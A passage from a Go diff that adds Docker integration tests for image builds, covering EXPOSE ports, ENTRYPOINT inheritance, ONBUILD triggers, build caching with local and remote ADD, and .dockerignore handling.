len(portList); i++ { + for j := 0; j < len(line); j++ { + p := i*len(line) + j + 1 + line[j] = strconv.Itoa(p) + expectedPorts[p-1] = p + } + if i == len(portList)-1 { + portList[i] = strings.Join(line, " ") + } else { + portList[i] = strings.Join(line, " ") + ` \` + } + } + + dockerfile := `FROM scratch + EXPOSE {{range .}} {{.}} + {{end}}` + tmpl := template.Must(template.New("dockerfile").Parse(dockerfile)) + buf := bytes.NewBuffer(nil) + tmpl.Execute(buf, portList) + + name := "testbuildexpose" + _, err := buildImage(name, buf.String(), true) + if err != nil { + c.Fatal(err) + } + + // check if all the ports are saved inside Config.ExposedPorts + res := inspectFieldJSON(c, name, "Config.ExposedPorts") + var exposedPorts map[string]interface{} + if err := json.Unmarshal([]byte(res), &exposedPorts); err != nil { + c.Fatal(err) + } + + for _, p := range expectedPorts { + ep := fmt.Sprintf("%d/tcp", p) + if _, ok := exposedPorts[ep]; !ok { + c.Errorf("Port(%s) is not exposed", ep) + } else { + delete(exposedPorts, ep) + } + } + if len(exposedPorts) != 0 { + c.Errorf("Unexpected extra exposed ports %v", exposedPorts) + } +} + +func (s *DockerSuite) TestBuildExposeOrder(c *check.C) { + testRequires(c, DaemonIsLinux) // Expose not implemented on Windows + buildID := func(name, exposed string) string { + _, err := buildImage(name, fmt.Sprintf(`FROM scratch + EXPOSE %s`, exposed), true) + if err != nil { + c.Fatal(err) + } + id := inspectField(c, name, "Id") + return id + } + + id1 := buildID("testbuildexpose1", "80 2375") + id2 := buildID("testbuildexpose2", "2375 80") + if id1 != id2 { + c.Errorf("EXPOSE should invalidate the cache only when ports actually changed") + } +} + +func (s *DockerSuite) TestBuildExposeUpperCaseProto(c *check.C) { + testRequires(c, DaemonIsLinux) // Expose not implemented on Windows + name := "testbuildexposeuppercaseproto" + expected := "map[5678/udp:{}]" + _, err := buildImage(name, + `FROM scratch + EXPOSE 5678/UDP`, + true) + if err != 
nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.ExposedPorts") + if res != expected { + c.Fatalf("Exposed ports %s, expected %s", res, expected) + } +} + +func (s *DockerSuite) TestBuildEmptyEntrypointInheritance(c *check.C) { + name := "testbuildentrypointinheritance" + name2 := "testbuildentrypointinheritance2" + + _, err := buildImage(name, + `FROM busybox + ENTRYPOINT ["/bin/echo"]`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.Entrypoint") + + expected := "[/bin/echo]" + if res != expected { + c.Fatalf("Entrypoint %s, expected %s", res, expected) + } + + _, err = buildImage(name2, + fmt.Sprintf(`FROM %s + ENTRYPOINT []`, name), + true) + if err != nil { + c.Fatal(err) + } + res = inspectField(c, name2, "Config.Entrypoint") + + expected = "[]" + + if res != expected { + c.Fatalf("Entrypoint %s, expected %s", res, expected) + } + +} + +func (s *DockerSuite) TestBuildEmptyEntrypoint(c *check.C) { + name := "testbuildentrypoint" + expected := "[]" + + _, err := buildImage(name, + `FROM busybox + ENTRYPOINT []`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.Entrypoint") + if res != expected { + c.Fatalf("Entrypoint %s, expected %s", res, expected) + } + +} + +func (s *DockerSuite) TestBuildEntrypoint(c *check.C) { + name := "testbuildentrypoint" + + expected := "[/bin/echo]" + _, err := buildImage(name, + `FROM `+minimalBaseImage()+` + ENTRYPOINT ["/bin/echo"]`, + true) + if err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.Entrypoint") + if res != expected { + c.Fatalf("Entrypoint %s, expected %s", res, expected) + } + +} + +// #6445 ensure ONBUILD triggers aren't committed to grandchildren +func (s *DockerSuite) TestBuildOnBuildLimitedInheritence(c *check.C) { + var ( + out2, out3 string + ) + { + name1 := "testonbuildtrigger1" + dockerfile1 := ` + FROM busybox + RUN echo "GRANDPARENT" + ONBUILD RUN echo "ONBUILD PARENT" + ` + ctx, err := 
fakeContext(dockerfile1, nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + out1, _, err := dockerCmdInDir(c, ctx.Dir, "build", "-t", name1, ".") + if err != nil { + c.Fatalf("build failed to complete: %s, %v", out1, err) + } + } + { + name2 := "testonbuildtrigger2" + dockerfile2 := ` + FROM testonbuildtrigger1 + ` + ctx, err := fakeContext(dockerfile2, nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + out2, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-t", name2, ".") + if err != nil { + c.Fatalf("build failed to complete: %s, %v", out2, err) + } + } + { + name3 := "testonbuildtrigger3" + dockerfile3 := ` + FROM testonbuildtrigger2 + ` + ctx, err := fakeContext(dockerfile3, nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + out3, _, err = dockerCmdInDir(c, ctx.Dir, "build", "-t", name3, ".") + if err != nil { + c.Fatalf("build failed to complete: %s, %v", out3, err) + } + + } + + // ONBUILD should be run in second build. + if !strings.Contains(out2, "ONBUILD PARENT") { + c.Fatalf("ONBUILD instruction did not run in child of ONBUILD parent") + } + + // ONBUILD should *not* be run in third build. 
+ if strings.Contains(out3, "ONBUILD PARENT") { + c.Fatalf("ONBUILD instruction ran in grandchild of ONBUILD parent") + } + +} + +func (s *DockerSuite) TestBuildWithCache(c *check.C) { + testRequires(c, DaemonIsLinux) // Expose not implemented on Windows + name := "testbuildwithcache" + id1, err := buildImage(name, + `FROM scratch + MAINTAINER dockerio + EXPOSE 5432 + ENTRYPOINT ["/bin/echo"]`, + true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImage(name, + `FROM scratch + MAINTAINER dockerio + EXPOSE 5432 + ENTRYPOINT ["/bin/echo"]`, + true) + if err != nil { + c.Fatal(err) + } + if id1 != id2 { + c.Fatal("The cache should have been used but hasn't.") + } +} + +func (s *DockerSuite) TestBuildWithoutCache(c *check.C) { + testRequires(c, DaemonIsLinux) // Expose not implemented on Windows + name := "testbuildwithoutcache" + name2 := "testbuildwithoutcache2" + id1, err := buildImage(name, + `FROM scratch + MAINTAINER dockerio + EXPOSE 5432 + ENTRYPOINT ["/bin/echo"]`, + true) + if err != nil { + c.Fatal(err) + } + + id2, err := buildImage(name2, + `FROM scratch + MAINTAINER dockerio + EXPOSE 5432 + ENTRYPOINT ["/bin/echo"]`, + false) + if err != nil { + c.Fatal(err) + } + if id1 == id2 { + c.Fatal("The cache should have been invalided but hasn't.") + } +} + +func (s *DockerSuite) TestBuildConditionalCache(c *check.C) { + name := "testbuildconditionalcache" + + dockerfile := ` + FROM busybox + ADD foo /tmp/` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatalf("Error building #1: %s", err) + } + + if err := ctx.Add("foo", "bye"); err != nil { + c.Fatalf("Error modifying foo: %s", err) + } + + id2, err := buildImageFromContext(name, ctx, false) + if err != nil { + c.Fatalf("Error building #2: %s", err) + } + if id2 == id1 { + c.Fatal("Should not have used the cache") + } + + id3, err := 
buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatalf("Error building #3: %s", err) + } + if id3 != id2 { + c.Fatal("Should have used the cache") + } +} + +func (s *DockerSuite) TestBuildAddLocalFileWithCache(c *check.C) { + // local files are not owned by the correct user + testRequires(c, NotUserNamespace) + name := "testbuildaddlocalfilewithcache" + name2 := "testbuildaddlocalfilewithcache2" + dockerfile := ` + FROM busybox + MAINTAINER dockerio + ADD foo /usr/lib/bla/bar + RUN sh -c "[ $(cat /usr/lib/bla/bar) = "hello" ]"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name2, ctx, true) + if err != nil { + c.Fatal(err) + } + if id1 != id2 { + c.Fatal("The cache should have been used but hasn't.") + } +} + +func (s *DockerSuite) TestBuildAddMultipleLocalFileWithCache(c *check.C) { + name := "testbuildaddmultiplelocalfilewithcache" + name2 := "testbuildaddmultiplelocalfilewithcache2" + dockerfile := ` + FROM busybox + MAINTAINER dockerio + ADD foo Dockerfile /usr/lib/bla/ + RUN sh -c "[ $(cat /usr/lib/bla/foo) = "hello" ]"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name2, ctx, true) + if err != nil { + c.Fatal(err) + } + if id1 != id2 { + c.Fatal("The cache should have been used but hasn't.") + } +} + +func (s *DockerSuite) TestBuildAddLocalFileWithoutCache(c *check.C) { + // local files are not owned by the correct user + testRequires(c, NotUserNamespace) + name := "testbuildaddlocalfilewithoutcache" + name2 := "testbuildaddlocalfilewithoutcache2" + dockerfile := ` + FROM busybox + MAINTAINER dockerio + ADD foo 
/usr/lib/bla/bar + RUN sh -c "[ $(cat /usr/lib/bla/bar) = "hello" ]"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name2, ctx, false) + if err != nil { + c.Fatal(err) + } + if id1 == id2 { + c.Fatal("The cache should have been invalided but hasn't.") + } +} + +func (s *DockerSuite) TestBuildCopyDirButNotFile(c *check.C) { + name := "testbuildcopydirbutnotfile" + name2 := "testbuildcopydirbutnotfile2" + + dockerfile := ` + FROM ` + minimalBaseImage() + ` + COPY dir /tmp/` + ctx, err := fakeContext(dockerfile, map[string]string{ + "dir/foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + // Check that adding file with similar name doesn't mess with cache + if err := ctx.Add("dir_file", "hello2"); err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name2, ctx, true) + if err != nil { + c.Fatal(err) + } + if id1 != id2 { + c.Fatal("The cache should have been used but wasn't") + } +} + +func (s *DockerSuite) TestBuildAddCurrentDirWithCache(c *check.C) { + name := "testbuildaddcurrentdirwithcache" + name2 := name + "2" + name3 := name + "3" + name4 := name + "4" + dockerfile := ` + FROM ` + minimalBaseImage() + ` + MAINTAINER dockerio + ADD . /usr/lib/bla` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + // Check that adding file invalidate cache of "ADD ." 
+ if err := ctx.Add("bar", "hello2"); err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name2, ctx, true) + if err != nil { + c.Fatal(err) + } + if id1 == id2 { + c.Fatal("The cache should have been invalided but hasn't.") + } + // Check that changing file invalidate cache of "ADD ." + if err := ctx.Add("foo", "hello1"); err != nil { + c.Fatal(err) + } + id3, err := buildImageFromContext(name3, ctx, true) + if err != nil { + c.Fatal(err) + } + if id2 == id3 { + c.Fatal("The cache should have been invalided but hasn't.") + } + // Check that changing file to same content with different mtime does not + // invalidate cache of "ADD ." + time.Sleep(1 * time.Second) // wait second because of mtime precision + if err := ctx.Add("foo", "hello1"); err != nil { + c.Fatal(err) + } + id4, err := buildImageFromContext(name4, ctx, true) + if err != nil { + c.Fatal(err) + } + if id3 != id4 { + c.Fatal("The cache should have been used but hasn't.") + } +} + +func (s *DockerSuite) TestBuildAddCurrentDirWithoutCache(c *check.C) { + name := "testbuildaddcurrentdirwithoutcache" + name2 := "testbuildaddcurrentdirwithoutcache2" + dockerfile := ` + FROM ` + minimalBaseImage() + ` + MAINTAINER dockerio + ADD . 
/usr/lib/bla` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name2, ctx, false) + if err != nil { + c.Fatal(err) + } + if id1 == id2 { + c.Fatal("The cache should have been invalided but hasn't.") + } +} + +func (s *DockerSuite) TestBuildAddRemoteFileWithCache(c *check.C) { + name := "testbuildaddremotefilewithcache" + server, err := fakeStorage(map[string]string{ + "baz": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + id1, err := buildImage(name, + fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD %s/baz /usr/lib/baz/quux`, server.URL()), + true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImage(name, + fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD %s/baz /usr/lib/baz/quux`, server.URL()), + true) + if err != nil { + c.Fatal(err) + } + if id1 != id2 { + c.Fatal("The cache should have been used but hasn't.") + } +} + +func (s *DockerSuite) TestBuildAddRemoteFileWithoutCache(c *check.C) { + name := "testbuildaddremotefilewithoutcache" + name2 := "testbuildaddremotefilewithoutcache2" + server, err := fakeStorage(map[string]string{ + "baz": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + id1, err := buildImage(name, + fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD %s/baz /usr/lib/baz/quux`, server.URL()), + true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImage(name2, + fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD %s/baz /usr/lib/baz/quux`, server.URL()), + false) + if err != nil { + c.Fatal(err) + } + if id1 == id2 { + c.Fatal("The cache should have been invalided but hasn't.") + } +} + +func (s *DockerSuite) TestBuildAddRemoteFileMTime(c *check.C) { + name := 
"testbuildaddremotefilemtime" + name2 := name + "2" + name3 := name + "3" + + files := map[string]string{"baz": "hello"} + server, err := fakeStorage(files) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD %s/baz /usr/lib/baz/quux`, server.URL()), nil) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + + id2, err := buildImageFromContext(name2, ctx, true) + if err != nil { + c.Fatal(err) + } + if id1 != id2 { + c.Fatal("The cache should have been used but wasn't - #1") + } + + // Now create a different server with same contents (causes different mtime) + // The cache should still be used + + // allow some time for clock to pass as mtime precision is only 1s + time.Sleep(2 * time.Second) + + server2, err := fakeStorage(files) + if err != nil { + c.Fatal(err) + } + defer server2.Close() + + ctx2, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD %s/baz /usr/lib/baz/quux`, server2.URL()), nil) + if err != nil { + c.Fatal(err) + } + defer ctx2.Close() + id3, err := buildImageFromContext(name3, ctx2, true) + if err != nil { + c.Fatal(err) + } + if id1 != id3 { + c.Fatal("The cache should have been used but wasn't") + } +} + +func (s *DockerSuite) TestBuildAddLocalAndRemoteFilesWithCache(c *check.C) { + name := "testbuildaddlocalandremotefilewithcache" + server, err := fakeStorage(map[string]string{ + "baz": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD foo /usr/lib/bla/bar + ADD %s/baz /usr/lib/baz/quux`, server.URL()), + map[string]string{ + "foo": "hello world", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + 
c.Fatal(err) + } + id2, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + if id1 != id2 { + c.Fatal("The cache should have been used but hasn't.") + } +} + +func testContextTar(c *check.C, compression archive.Compression) { + ctx, err := fakeContext( + `FROM busybox +ADD foo /foo +CMD ["cat", "/foo"]`, + map[string]string{ + "foo": "bar", + }, + ) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + context, err := archive.Tar(ctx.Dir, compression) + if err != nil { + c.Fatalf("failed to build context tar: %v", err) + } + name := "contexttar" + buildCmd := exec.Command(dockerBinary, "build", "-t", name, "-") + buildCmd.Stdin = context + + if out, _, err := runCommandWithOutput(buildCmd); err != nil { + c.Fatalf("build failed to complete: %v %v", out, err) + } +} + +func (s *DockerSuite) TestBuildContextTarGzip(c *check.C) { + testContextTar(c, archive.Gzip) +} + +func (s *DockerSuite) TestBuildContextTarNoCompression(c *check.C) { + testContextTar(c, archive.Uncompressed) +} + +func (s *DockerSuite) TestBuildNoContext(c *check.C) { + buildCmd := exec.Command(dockerBinary, "build", "-t", "nocontext", "-") + buildCmd.Stdin = strings.NewReader( + `FROM busybox + CMD ["echo", "ok"]`) + + if out, _, err := runCommandWithOutput(buildCmd); err != nil { + c.Fatalf("build failed to complete: %v %v", out, err) + } + + if out, _ := dockerCmd(c, "run", "--rm", "nocontext"); out != "ok\n" { + c.Fatalf("run produced invalid output: %q, expected %q", out, "ok") + } +} + +// TODO: TestCaching +func (s *DockerSuite) TestBuildAddLocalAndRemoteFilesWithoutCache(c *check.C) { + name := "testbuildaddlocalandremotefilewithoutcache" + name2 := "testbuildaddlocalandremotefilewithoutcache2" + server, err := fakeStorage(map[string]string{ + "baz": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer server.Close() + + ctx, err := fakeContext(fmt.Sprintf(`FROM `+minimalBaseImage()+` + MAINTAINER dockerio + ADD foo /usr/lib/bla/bar + ADD %s/baz 
/usr/lib/baz/quux`, server.URL()), + map[string]string{ + "foo": "hello world", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + id1, err := buildImageFromContext(name, ctx, true) + if err != nil { + c.Fatal(err) + } + id2, err := buildImageFromContext(name2, ctx, false) + if err != nil { + c.Fatal(err) + } + if id1 == id2 { + c.Fatal("The cache should have been invalidated but hasn't.") + } +} + +func (s *DockerSuite) TestBuildWithVolumeOwnership(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildimg" + + _, err := buildImage(name, + `FROM busybox:latest + RUN mkdir /test && chown daemon:daemon /test && chmod 0600 /test + VOLUME /test`, + true) + + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "run", "--rm", "testbuildimg", "ls", "-la", "/test") + + if expected := "drw-------"; !strings.Contains(out, expected) { + c.Fatalf("expected %s received %s", expected, out) + } + + if expected := "daemon daemon"; !strings.Contains(out, expected) { + c.Fatalf("expected %s received %s", expected, out) + } + +} + +// testing #1405 - config.Cmd does not get cleaned up if +// utilizing cache +func (s *DockerSuite) TestBuildEntrypointRunCleanup(c *check.C) { + name := "testbuildcmdcleanup" + if _, err := buildImage(name, + `FROM busybox + RUN echo "hello"`, + true); err != nil { + c.Fatal(err) + } + + ctx, err := fakeContext(`FROM busybox + RUN echo "hello" + ADD foo /foo + ENTRYPOINT ["/bin/echo"]`, + map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } + res := inspectField(c, name, "Config.Cmd") + // Cmd must be cleaned up + if res != "[]" { + c.Fatalf("Cmd %s, expected nil", res) + } +} + +func (s *DockerSuite) TestBuildAddFileNotFound(c *check.C) { + name := "testbuildaddnotfound" + expected := "foo: no such file or directory" + + if daemonPlatform == "windows" { + expected = "foo: The system 
cannot find the file specified" + } + + ctx, err := fakeContext(`FROM `+minimalBaseImage()+` + ADD foo /usr/local/bar`, + map[string]string{"bar": "hello"}) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err := buildImageFromContext(name, ctx, true); err != nil { + if !strings.Contains(err.Error(), expected) { + c.Fatalf("Wrong error %v, must be about missing foo file or directory", err) + } + } else { + c.Fatal("Error must not be nil") + } +} + +func (s *DockerSuite) TestBuildInheritance(c *check.C) { + testRequires(c, DaemonIsLinux) + name := "testbuildinheritance" + + _, err := buildImage(name, + `FROM scratch + EXPOSE 2375`, + true) + if err != nil { + c.Fatal(err) + } + ports1 := inspectField(c, name, "Config.ExposedPorts") + + _, err = buildImage(name, + fmt.Sprintf(`FROM %s + ENTRYPOINT ["/bin/echo"]`, name), + true) + if err != nil { + c.Fatal(err) + } + + res := inspectField(c, name, "Config.Entrypoint") + if expected := "[/bin/echo]"; res != expected { + c.Fatalf("Entrypoint %s, expected %s", res, expected) + } + ports2 := inspectField(c, name, "Config.ExposedPorts") + if ports1 != ports2 { + c.Fatalf("Ports must be same: %s != %s", ports1, ports2) + } +} + +func (s *DockerSuite) TestBuildFails(c *check.C) { + name := "testbuildfails" + _, err := buildImage(name, + `FROM busybox + RUN sh -c "exit 23"`, + true) + if err != nil { + if !strings.Contains(err.Error(), "returned a non-zero code: 23") { + c.Fatalf("Wrong error %v, must be about non-zero code 23", err) + } + } else { + c.Fatal("Error must not be nil") + } +} + +func (s *DockerSuite) TestBuildOnBuild(c *check.C) { + name := "testbuildonbuild" + _, err := buildImage(name, + `FROM busybox + ONBUILD RUN touch foobar`, + true) + if err != nil { + c.Fatal(err) + } + _, err = buildImage(name, + fmt.Sprintf(`FROM %s + RUN [ -f foobar ]`, name), + true) + if err != nil { + c.Fatal(err) + } +} + +// gh #2446 +func (s *DockerSuite) TestBuildAddToSymlinkDest(c *check.C) { + makeLink := `ln 
-s /foo /bar` + if daemonPlatform == "windows" { + makeLink = `mklink /D C:\bar C:\foo` + } + name := "testbuildaddtosymlinkdest" + ctx, err := fakeContext(`FROM busybox + RUN sh -c "mkdir /foo" + RUN `+makeLink+` + ADD foo /bar/ + RUN sh -c "[ -f /bar/foo ]" + RUN sh -c "[ -f /foo/foo ]"`, + map[string]string{ + "foo": "hello", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildEscapeWhitespace(c *check.C) { + name := "testbuildescapewhitespace" + + _, err := buildImage(name, ` + # ESCAPE=\ + FROM busybox + MAINTAINER "Docker \ +IO " + `, true) + if err != nil { + c.Fatal(err) + } + + res := inspectField(c, name, "Author") + + if res != "\"Docker IO \"" { + c.Fatalf("Parsed string did not match the escaped string. Got: %q", res) + } + +} + +func (s *DockerSuite) TestBuildVerifyIntString(c *check.C) { + // Verify that strings that look like ints are still passed as strings + name := "testbuildstringing" + + _, err := buildImage(name, ` + FROM busybox + MAINTAINER 123 + `, true) + + if err != nil { + c.Fatal(err) + } + + out, _ := dockerCmd(c, "inspect", name) + + if !strings.Contains(out, "\"123\"") { + c.Fatalf("Output does not contain the int as a string:\n%s", out) + } + +} + +func (s *DockerSuite) TestBuildDockerignore(c *check.C) { + name := "testbuilddockerignore" + dockerfile := ` + FROM busybox + ADD . /bla + RUN sh -c "[[ -f /bla/src/x.go ]]" + RUN sh -c "[[ -f /bla/Makefile ]]" + RUN sh -c "[[ ! -e /bla/src/_vendor ]]" + RUN sh -c "[[ ! -e /bla/.gitignore ]]" + RUN sh -c "[[ ! -e /bla/README.md ]]" + RUN sh -c "[[ ! -e /bla/dir/foo ]]" + RUN sh -c "[[ ! -e /bla/foo ]]" + RUN sh -c "[[ ! -e /bla/.git ]]" + RUN sh -c "[[ ! -e v.cc ]]" + RUN sh -c "[[ ! -e src/v.cc ]]" + RUN sh -c "[[ ! 
-e src/_vendor/v.cc ]]"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Makefile": "all:", + ".git/HEAD": "ref: foo", + "src/x.go": "package main", + "src/_vendor/v.go": "package main", + "src/_vendor/v.cc": "package main", + "src/v.cc": "package main", + "v.cc": "package main", + "dir/foo": "", + ".gitignore": "", + "README.md": "readme", + ".dockerignore": ` +.git +pkg +.gitignore +src/_vendor +*.md +**/*.cc +dir`, + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildDockerignoreCleanPaths(c *check.C) { + name := "testbuilddockerignorecleanpaths" + dockerfile := ` + FROM busybox + ADD . /tmp/ + RUN sh -c "(! ls /tmp/foo) && (! ls /tmp/foo2) && (! ls /tmp/dir1/foo)"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "foo": "foo", + "foo2": "foo2", + "dir1/foo": "foo in dir1", + ".dockerignore": "./foo\ndir1//foo\n./dir1/../foo2", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildDockerignoreExceptions(c *check.C) { + name := "testbuilddockerignoreexceptions" + dockerfile := ` + FROM busybox + ADD . /bla + RUN sh -c "[[ -f /bla/src/x.go ]]" + RUN sh -c "[[ -f /bla/Makefile ]]" + RUN sh -c "[[ ! -e /bla/src/_vendor ]]" + RUN sh -c "[[ ! -e /bla/.gitignore ]]" + RUN sh -c "[[ ! -e /bla/README.md ]]" + RUN sh -c "[[ -e /bla/dir/dir/foo ]]" + RUN sh -c "[[ ! -e /bla/dir/foo1 ]]" + RUN sh -c "[[ -f /bla/dir/e ]]" + RUN sh -c "[[ -f /bla/dir/e-dir/foo ]]" + RUN sh -c "[[ ! -e /bla/foo ]]" + RUN sh -c "[[ ! 
-e /bla/.git ]]" + RUN sh -c "[[ -e /bla/dir/a.cc ]]"` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Makefile": "all:", + ".git/HEAD": "ref: foo", + "src/x.go": "package main", + "src/_vendor/v.go": "package main", + "dir/foo": "", + "dir/foo1": "", + "dir/dir/f1": "", + "dir/dir/foo": "", + "dir/e": "", + "dir/e-dir/foo": "", + ".gitignore": "", + "README.md": "readme", + "dir/a.cc": "hello", + ".dockerignore": ` +.git +pkg +.gitignore +src/_vendor +*.md +dir +!dir/e* +!dir/dir/foo +**/*.cc +!**/*.cc`, + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err := buildImageFromContext(name, ctx, true); err != nil { + c.Fatal(err) + } +} + +func (s *DockerSuite) TestBuildDockerignoringDockerfile(c *check.C) { + name := "testbuilddockerignoredockerfile" + dockerfile := ` + FROM busybox + ADD . /tmp/ + RUN sh -c "! ls /tmp/Dockerfile" + RUN ls /tmp/.dockerignore` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": dockerfile, + ".dockerignore": "Dockerfile\n", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't ignore Dockerfile correctly:%s", err) + } + + // now try it with ./Dockerfile + ctx.Add(".dockerignore", "./Dockerfile\n") + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't ignore ./Dockerfile correctly:%s", err) + } + +} + +func (s *DockerSuite) TestBuildDockerignoringRenamedDockerfile(c *check.C) { + name := "testbuilddockerignoredockerfile" + dockerfile := ` + FROM busybox + ADD . /tmp/ + RUN ls /tmp/Dockerfile + RUN sh -c "! 
ls /tmp/MyDockerfile" + RUN ls /tmp/.dockerignore` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": "Should not use me", + "MyDockerfile": dockerfile, + ".dockerignore": "MyDockerfile\n", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't ignore MyDockerfile correctly:%s", err) + } + + // now try it with ./MyDockerfile + ctx.Add(".dockerignore", "./MyDockerfile\n") + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't ignore ./MyDockerfile correctly:%s", err) + } + +} + +func (s *DockerSuite) TestBuildDockerignoringDockerignore(c *check.C) { + name := "testbuilddockerignoredockerignore" + dockerfile := ` + FROM busybox + ADD . /tmp/ + RUN sh -c "! ls /tmp/.dockerignore" + RUN ls /tmp/Dockerfile` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": dockerfile, + ".dockerignore": ".dockerignore\n", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + if _, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't ignore .dockerignore correctly:%s", err) + } +} + +func (s *DockerSuite) TestBuildDockerignoreTouchDockerfile(c *check.C) { + var id1 string + var id2 string + + name := "testbuilddockerignoretouchdockerfile" + dockerfile := ` + FROM busybox + ADD . 
/tmp/` + ctx, err := fakeContext(dockerfile, map[string]string{ + "Dockerfile": dockerfile, + ".dockerignore": "Dockerfile\n", + }) + if err != nil { + c.Fatal(err) + } + defer ctx.Close() + + if id1, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't build it correctly:%s", err) + } + + if id2, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't build it correctly:%s", err) + } + if id1 != id2 { + c.Fatalf("Didn't use the cache - 1") + } + + // Now make sure touching Dockerfile doesn't invalidate the cache + if err = ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil { + c.Fatalf("Didn't add Dockerfile: %s", err) + } + if id2, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't build it correctly:%s", err) + } + if id1 != id2 { + c.Fatalf("Didn't use the cache - 2") + } + + // One more time but just 'touch' it instead of changing the content + if err = ctx.Add("Dockerfile", dockerfile+"\n# hi"); err != nil { + c.Fatalf("Didn't add Dockerfile: %s", err) + } + if id2, err = buildImageFromContext(name, ctx, true); err != nil { + c.Fatalf("Didn't build it correctly:%s", err) + } + if id1 != id2 { + c.Fatalf("Didn't use the cache - 3") + } + +} + +func (s *DockerSuite) 